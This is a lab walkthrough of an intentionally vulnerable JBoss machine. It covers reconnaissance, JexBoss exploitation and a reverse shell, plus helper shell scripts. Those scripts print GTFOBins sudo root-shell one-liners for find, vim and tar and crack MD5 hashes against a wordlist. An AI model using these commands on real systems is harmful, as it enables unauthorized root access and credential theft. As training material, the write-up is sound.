Difficulty: Easy
Before we start, there are a few things I want to mention.
1: The first few tasks are mainly reading, and the answers are right in front of you, so we will start from Task 3 “Reconnaissance”, where we actually run tools and look at output.
2: In Task 5 “Exploit!” I, like many others, could not get the task's exploit to work, so save yourself A LOT of time and trouble and grab the JexBoss tool from the link below instead.
Jexboss: https://github.com/joaomatosf/jexboss
With that said let’s start!
First, our good ol’ nmap:
That is a fair few services, so let’s wait for nmap to finish and go through the output:
We can see what service is running on port 8080, and we can safely assume the “Front-end” application is the one named in the http-title:
We also have another web server running on port 80:
The title suggests a blog-style website, so let’s check that out first!
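Reading the open ports off a screenshot does not scale, so here is an added example of my own (it is not from this write-up): run nmap with -oA so you get a greppable .gnmap file alongside the normal output, then pull the open TCP services and the web ports out of it with awk. The scan file it builds is constructed for the example with made-up banners, not the room's real output, and the target address and wordlist path in the gobuster lines are placeholders.

```bash
#!/bin/sh
# Added example, not code from the original write-up.
# Parses nmap's greppable output (-oG, or the .gnmap file written by -oA) to
# list open TCP services and pick out the web ports worth pointing gobuster at.
# Real usage:  nmap -sC -sV -oA scan <target>   then   open_tcp_services scan.gnmap
set -eu

# Constructed sample .gnmap (not the room's scan; the banners are made up).
# In -oG output the sections of a Host line are tab-separated and each port
# entry is port/state/proto/owner/service/rpcinfo/version/ (nmap escapes any
# "/" inside the version text as "|", so splitting on "/" is safe).
make_sample_gnmap() {
    printf '# Nmap scan initiated as: nmap -sC -sV -oA scan 10.10.10.10\n' > "$1"
    printf 'Host: 10.10.10.10 ()\tStatus: Up\n' >> "$1"
    printf 'Host: 10.10.10.10 ()\tPorts: %s\tIgnored State: closed (996)\n' \
        '22/open/tcp//ssh//OpenSSH 7.2p2/, 80/open/tcp//http//Apache httpd 2.4.18/, 8080/open/tcp//http//Apache Tomcat|Coyote JSP engine 1.1/, 111/filtered/tcp//rpcbind///' >> "$1"
    printf '# Nmap done\n' >> "$1"
}

# Print "port service version" for every open TCP port in a .gnmap file.
open_tcp_services() {
    awk 'BEGIN { FS = "\t" }
         /^Host:/ {
             for (i = 2; i <= NF; i++) {
                 if ($i !~ /^Ports: /) continue
                 sub(/^Ports: /, "", $i)
                 n = split($i, entry, /\/, /)          # entries end in "/" and are joined by ", "
                 for (j = 1; j <= n; j++) {
                     split(entry[j], f, "/")
                     if (f[2] == "open" && f[3] == "tcp") print f[1], f[5], f[7]
                 }
             }
         }' "$1"
}

# Ports whose detected service is HTTP-ish: the ones to hand to gobuster.
web_ports() {
    open_tcp_services "$1" | awk '$2 ~ /^(http|https|http-proxy|http-alt)$/ { print $1 }'
}

# Print a gobuster command per web port ($2 is the target host; edit the wordlist path).
gobuster_commands() {
    for p in $(web_ports "$1"); do
        printf 'gobuster dir -u http://%s:%s/ -w /usr/share/wordlists/dirb/common.txt\n' "$2" "$p"
    done
}
```

The -oG format is stable enough to script against, and the web_ports list is exactly the set of ports you would hand to gobuster next.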
One thing I noticed is that the question in Task 4 “Find Tony’s Flag” explicitly mentions having an unbiased opinion.
The first thing I noticed here was a reference in the first post to a possibly biased opinion, so I want to check out that first post.
Looking down the post I see an image. Remember from the room’s tags that it covers steganography and cryptography, so we know going in that we need to be somewhat familiar with both to complete this room:
The tags also hint at anything that can hide data, such as image files, so I want to grab this image and examine it further:
Now that we have it, let’s run a few things against it.
The one easily overlooked command here is “strings”, which prints the runs of printable characters (four or more by default) found in a file.
So that is where I check first, before heading to steganography tools and potentially missing the obvious:
Sometimes you just get a lot of useless junk, but in a CTF it can also turn up things like, say, Tony’s flag?:
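As an added example of the strings-first triage above (my own code, not the write-up's), here is a small script that runs strings against an image and filters for flag-shaped text, with a tr/grep fallback for boxes without binutils. It assumes a THM{...} flag format, which the room does not state, and the file it builds is a constructed JPEG-like blob with a flag appended after the end-of-image marker, not the room's image.

```bash
#!/bin/sh
# Added example, not code from the original write-up: a quick triage of an image
# for readable text before reaching for steganography tools.
# Assumptions (mine, not the room's): the flag looks like THM{...}, and the
# sample file built below is constructed here; it is not the room's image.
set -eu

# Print runs of printable characters of at least $2 bytes (default 8) from file $1.
# strings(1) does exactly this; the tr/grep branch is a portable fallback.
printable_runs() {
    if command -v strings >/dev/null 2>&1; then
        strings -a -n "${2:-8}" "$1"
    else
        tr -c '[:print:]' '\n' < "$1" | grep -E "^.{${2:-8},}$" || true
    fi
}

# Print every THM{...} string in the file, deduplicated (nothing if none).
# The minimum run length drops to 4 here so a short flag is not skipped.
find_flags() {
    printable_runs "$1" 4 | grep -oE 'THM\{[^}]+\}' | sort -u || true
}

# Build a constructed JPEG-like file: SOI + APP0 marker, a run of opaque bytes,
# the EOI marker, then text appended after the image data, which is exactly
# where a hide-in-plain-sight flag tends to end up (viewers ignore the trailer).
make_sample_image() {
    {
        printf '\377\330\377\340\000\020JFIF\000'          # FF D8 FF E0 00 10 "JFIF" 00
        dd if=/dev/zero bs=512 count=1 2>/dev/null         # stand-in for pixel data
        printf '\377\331'                                  # FF D9 end-of-image
        printf 'ignore this noise THM{constructed_example_flag} trailing text\n'
    } > "$1"
}
```

Run printable_runs with the default length first to skim, then find_flags; if both come back empty, that is the point to move on to steghide, binwalk or exiftool, not before.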
Now we can approach the next, frustrating task, Task 5 “Exploit!”. If you read the beginning, I will assume you have already git cloned the JexBoss tool and it is ready to use.
With that said let’s continue!
At this point I want to run gobuster against both web servers (ports 80 and 8080) to see if we can find anything extra.
We found additional directories, but nothing of interest, so to save you time digging in the wrong places,
let’s move on with the exploitation using JexBoss:
NOTE: This was a little fiddly and I had to run it a few times before it obtained a shell.
Something I thought was neat is that JexBoss gives you the command for a bash reverse shell, so you can simply set up a nc listener, execute the reverse shell, and work from there instead of inside the python script.
So let’s do just that and send ourselves a bash reverse shell:
Great! Now we can enumerate our way to root, picking up the flags along the way.
First, upgrade the shell:
Then check the users:
Then the system-wide crontab:
Nothing interesting here.
Then sudo -l:
We cannot use sudo -l, as we don’t know this user’s password, so let’s look at the other users’ home directories.
First, jboss:
We can see two files here: one called “note” and a hidden one called .jboss.txt.
So let’s check out the hidden file:
And we have the jboss user flag!
Now to check the note:
Okay, cool! We got a password for the user jboss, so we can now su to jboss:
Awesome, we are now jboss. Now to try sudo -l, which we could not do before:
We have find, runnable as root without a password, so can you guess what we do next?
That’s right!
To GTFOBins, to see whether there is a sudo entry for the find command:
And there is! Now to gain root:
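For the sudo -l step above, here is an added example of my own (not from the write-up or GTFOBins itself) that reads sudo -l output for NOPASSWD entries and prints the GTFOBins sudo one-liner for the binaries it knows, find included. The sudo -l text inside it is constructed for the example and goes beyond what the room shows (it adds (ALL : ALL) and a comma-separated list) so the parser handles the common sudoers shapes, not just this box.

```bash
#!/bin/sh
# Added example, not code from the original write-up: read `sudo -l` output for
# NOPASSWD entries and produce the GTFOBins sudo one-liner for each known binary.
# The sudo -l text below is constructed for the example; it is not the room's.
set -eu

SAMPLE_SUDO_L='Matching Defaults entries for jboss on this host:
    env_reset, mail_badpass, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User jboss may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/less
    (ALL : ALL) NOPASSWD: /usr/bin/vim, /bin/tar'

# Print, one per line, the commands runnable as root without a password.
# Matches the common (root), (ALL) and (ALL : ALL) RunAs forms; tags such as
# SETENV: that may precede the command are stripped along with NOPASSWD:.
nopasswd_root_commands() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*\((root|ALL)([ \t]*:[ \t]*ALL)?\)[ \t]+.*NOPASSWD:/ {
            sub(/^[^)]*\)[ \t]+/, "")                  # drop the (RunAs) prefix
            while (sub(/^[A-Z]+:[ \t]*/, "")) { }      # drop NOPASSWD:/SETENV: tags
            n = split($0, cmd, /,[ \t]*/)
            for (i = 1; i <= n; i++) print cmd[i]
        }'
}

# GTFOBins "sudo" entries for the binaries this example knows about.
# For find the trick is -exec: find spawns /bin/sh as root for the first
# match and -quit stops the walk there, so you get one shell, not one per file.
gtfobins_sudo() {
    case "$(basename "$1")" in
        find) printf 'sudo %s . -exec /bin/sh \\; -quit\n' "$1" ;;
        vim)  printf "sudo %s -c ':!/bin/sh'\n" "$1" ;;
        tar)  printf 'sudo %s -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\n' "$1" ;;
        *)    printf 'no entry here for %s; look it up at https://gtfobins.github.io/\n' "$1" ;;
    esac
}

# Walk the NOPASSWD list and print the escalation command for each entry.
suggest_escalations() {
    nopasswd_root_commands "$1" | while IFS= read -r cmd; do
        printf '%s -> %s\n' "$cmd" "$(gtfobins_sudo "$cmd")"
    done
}
```

After running the find one-liner, confirm with id or whoami before going for /root: a shell with a root prompt that still reports uid=1000 means the -exec never fired.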
Now that we are root, we can grab the last flag from /root/root.txt:
To me this looks like a base64 string, so let’s decode it (Base64decode.org or base64 -d both work):
We get what looks like a hash, so let’s use hash-identifier to see what it might be:
It is very likely MD5 or MD4, so let’s try cracking it with hashcat and rockyou.txt (hashcat mode 0 for MD5, 900 for MD4):
We get a match and our final root flag!
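The last three steps (decode, identify, crack) are easy to script, so here is an added example of my own (not from the write-up): it decodes the base64, classifies the digest by length the way hash-identifier does, and runs a wordlist against it with md5sum, which is all you need to sanity-check a candidate before handing it to hashcat. The root.txt value and the four-word list are constructed for the example (the value is the base64 of the MD5 of a word in that list); the room's real flag is not reproduced. It assumes GNU coreutils (base64 -d, md5sum), with openssl as a fallback.

```bash
#!/bin/sh
# Added example, not code from the original write-up: decode a base64 blob,
# classify the digest by length (the same heuristic hash-identifier uses), and
# run a wordlist against it offline.
# Assumes GNU coreutils (base64 -d, md5sum) or openssl as a fallback.
# The root.txt value and wordlist below are constructed for the example; the
# room's real flag is not reproduced here.
set -eu

SAMPLE_ROOT_TXT='NWY0ZGNjM2I1YWE3NjVkNjFkODMyN2RlYjg4MmNmOTk='
SAMPLE_WORDLIST='letmein
password
Password1
summer2019'

# Decode a base64 value passed as an argument (handy for text pasted from a shell).
decode_b64() { printf '%s' "$1" | base64 -d; }

# Hex MD5 of stdin, without the trailing "  -" that md5sum prints.
md5_hex() {
    if command -v md5sum >/dev/null 2>&1; then md5sum | cut -d' ' -f1
    else openssl dgst -md5 | sed 's/^.*= //'; fi
}

# Guess the family from the digest length; 32 hex chars is ambiguous between
# MD5, MD4 and NTLM, which is why hash-identifier lists several candidates.
hash_family() {
    h=$(printf '%s' "$1" | tr -d '[:space:]')
    case "$h" in *[!0-9a-fA-F]*|'') printf 'not a hex digest\n'; return 1 ;; esac
    case ${#h} in
        32) printf 'MD5/MD4/NTLM (32 hex chars)\n' ;;
        40) printf 'SHA-1 (40 hex chars)\n' ;;
        64) printf 'SHA-256 (64 hex chars)\n' ;;
        *)  printf 'unknown (%s hex chars)\n' "${#h}" ;;
    esac
}

# Try every line of wordlist file $2 against MD5 digest $1 (case-insensitive).
# Note printf '%s' rather than echo: echo would hash "word\n", which is not
# what hashcat hashes, so every candidate would silently miss.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(printf '%s' "$word" | md5_hex)" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# End to end: root.txt -> digest -> family -> cracked word.
# Against a real target the last step is:  hashcat -m 0 hash.txt rockyou.txt
solve_root_txt() {
    digest=$(decode_b64 "$1")
    printf 'digest: %s (%s)\n' "$digest" "$(hash_family "$digest")"
    wl=$(mktemp)
    printf '%s\n' "$SAMPLE_WORDLIST" > "$wl"
    crack_md5 "$digest" "$wl" || printf 'no match in wordlist\n'
    rm -f "$wl"
}
```

solve_root_txt "$SAMPLE_ROOT_TXT" walks the whole chain; swap the embedded wordlist for rockyou.txt only if you are happy waiting on a shell loop, since this is a correctness check, not a replacement for hashcat.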
And we are done! Congratulations and thank you for reading!
Please feel free to follow me on twitter if you like the write up: https://twitter.com/amec0e